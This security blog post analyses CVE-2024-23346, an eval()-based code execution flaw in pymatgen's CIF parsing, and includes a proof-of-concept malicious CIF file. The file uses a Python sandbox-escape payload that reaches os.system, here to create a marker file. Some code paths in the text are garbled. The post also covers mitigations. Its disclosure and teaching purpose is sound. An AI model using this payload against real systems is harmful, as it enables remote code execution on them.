CVE-2024-23346: Arbitrary Code Execution in Pymatgen via Insecure Deserialization


This blog post delves into CVE-2024-23346, a critical vulnerability residing within the pymatgen library, a popular Python package employed for materials science computations. The vulnerability exposes users to the risk of remote code execution (RCE) attacks.

Affected Software

Pymatgen versions prior to 2024.2.8 (inclusive)

Vulnerability Details

The crux of the issue lies within the JonesFaithfulTransformation.from_transformation_str() function. This function suffers from insecure deserialization due to its utilization of the eval() method when processing user-supplied input. This inherently perilous practice allows an attacker to embed malicious code within a crafted string, which subsequently gets executed during the deserialization process.

Vulnerability Code Details

The root cause of the vulnerability lies within the pymatgen/symmetry/ file, specifically between lines 97 and 111.

basis_change = [
    re.sub(r"(?<=\w|\))(?=\() | (?<=\))(?=\w) | (?<=(\d|a|b|c))(?=([abc]))", r"*", string, flags=re.X)
    for string in basis_change
([eval(x, {"__builtins__": None}, {"a": a, "b": b, "c": c}) for x in basis_change])

This code snippet involves a flawed sequence:

  • Regular Expression Manipulation: A regular expression operation is performed on user-supplied input (string). This regex aims to insert asterisks (*) between specific characters within the string.

  • Insecure Deserialization: The concerning aspect is the subsequent use of the eval() function. The modified strings (basis_change) are fed into eval(), attempting to evaluate them as Python code.


An adversary successfully exploiting this vulnerability can gain arbitrary code execution privileges on the targeted system. This grants them the ability to manipulate files, steal sensitive data, install malware, or even completely compromise the system.

Exploitation Scenario

  • Crafting the Payload: The attacker meticulously constructs a string containing malicious code encapsulated within a seemingly legitimate transformation string.

  • Targeting the Application: This crafted string is then delivered to the vulnerable application, potentially through a user-controlled input field or a compromised data source.

  • Deserialization and Execution: The application unwittingly parses the string using the eval() function, deserializing the embedded code and executing it within the application's context.

  • Privilege Escalation: If the application operates with elevated privileges, the attacker-injected code inherits those privileges, amplifying the exploit's impact.

Proof of Concept

To build a PoC lab for this vulnerability CVE-2024-23346, we first need to install the vulnerable version of pymatgen that is <=2024.2.8. We can do it as follow:

python3 -m pip install pymatgen==2024.1.26

Now we will use the following exploit CIF file for our PoC:

_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in
().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" +
"classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

The key element for exploitation lies within the _space_group_magn.transform_BNS_Pp_abc field. Here's a detailed explanation:

  • List Comprehension: The value contains a list comprehension wrapped within a single quoted string. This construct attempts to exploit the vulnerable eval() function in pymatgen

  • Mangled Code: The list comprehension utilizes obfuscated techniques to bypass basic detection. It retrieves the BuiltinImporter class, which can be abused to load modules and execute arbitrary code.

  • Code Execution: If eval() is used to process this string, the list comprehension code executes. It retrieves the os module and calls the system function to create a file named "pwned". This signifies successful code execution.

Then, we will parse the above cif file with the following code:

from import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
We can exexute this python code on the terminal and we will see that the
file is created which was our exploit payload in the cif file:

Attacker can further escalate this exploit to gain reverse shell from a target system or they can even use this vulnerability to deploy malwares.


Upgrading to pymatgen version 2024.2.20 (or later) is paramount to mitigating this vulnerability. This patched commit addresses the insecure usage of eval() by implementing a safer deserialization mechanism.


  • Maintain Software Updates: Enforce a rigorous software update policy to ensure all applications, particularly libraries like pymatgen, are updated promptly.

  • Input Validation: Implement robust input validation procedures to sanitize user-supplied data before processing it. This helps to thwart attempts to inject malicious code.

  • Least Privilege: Adhere to the principle of least privilege. Applications should operate with the minimum set of permissions required for their intended functionality. This mitigates the potential damage if an exploit is successful.


CVE-2024-23346 highlights the dangers associated with insecure deserialization practices. By meticulously following security best practices, such as code reviews, secure coding practices, and prompt software updates, developers can significantly reduce the attack surface and safeguard applications from similar vulnerabilities.


The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2024-23346 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.

CVE-2024-27316: A Deep Dive into the nghttp2 Header Overflow
CVE-2024-27316: A Deep Dive into the nghttp2 Header Overflow
James McGill
CVE-2024-36401: GeoServer and GeoTools - XPath Injection via commons-jxpath
CVE-2024-36401: GeoServer and GeoTools - XPath Injection via commons-jxpath
James McGill
A Deep Dive into CVE-2024-37032 (Ollama RCE Vulnerability)
A Deep Dive into CVE-2024-37032 (Ollama RCE Vulnerability)
James McGill
CVE-2024-28102: JWCrypto DoS Vulnerability
CVE-2024-28102: JWCrypto DoS Vulnerability
James McGill
CVE-2024-38355: Technical Analysis of Unhandled Exception in Socket.IO
CVE-2024-38355: Technical Analysis of Unhandled Exception in Socket.IO
James McGill
CVE-2024-27348: Dissecting the RCE Vulnerability in Apache HugeGraph Server
CVE-2024-27348: Dissecting the RCE Vulnerability in Apache HugeGraph Server
James McGill